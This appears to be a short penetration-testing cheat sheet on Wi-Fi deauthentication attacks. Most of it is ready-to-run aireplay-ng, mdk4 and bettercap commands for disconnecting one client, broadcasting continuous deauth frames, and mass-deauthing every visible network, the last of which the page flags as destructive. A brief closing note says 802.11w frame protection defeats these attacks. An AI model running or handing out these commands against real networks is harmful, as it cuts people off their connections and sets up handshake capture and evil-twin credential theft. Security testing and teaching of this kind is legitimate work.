Deauthentication Attacks

Exploitation

Deauthentication frames can disconnect clients from a network. This is used to capture handshakes, force clients to roam to an evil twin, or cause denial of service.

Aireplay-ng

Deauthenticate a single client.

01-single-deauth.sh
bash
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon

Broadcast deauth to all clients (continuous).

02-broadcast-deauth.sh
bash
sudo aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon

MDK4

MDK4 is more powerful. Deauthenticate a specific AP.

03-mdk4-target.sh
bash
echo "AA:BB:CC:DD:EE:FF" > target.txt
sudo mdk4 wlan0mon d -b target.txt

Mass deauth all visible networks (DESTRUCTIVE!).

04-mdk4-mass.sh
bash
sudo mdk4 wlan0mon d

Bettercap

Deauth using Bettercap.

05-bettercap-deauth.sh
bash
sudo bettercap -iface wlan0mon
> wifi.recon on
> wifi.deauth AA:BB:CC:DD:EE:FF

Note on 802.11w

802.11w (Management Frame Protection, MFP) defeats deauthentication attacks by cryptographically protecting management frames, so a protected client or AP discards forged deauthentication frames. Modern networks and clients may have MFP enabled, rendering these attacks ineffective.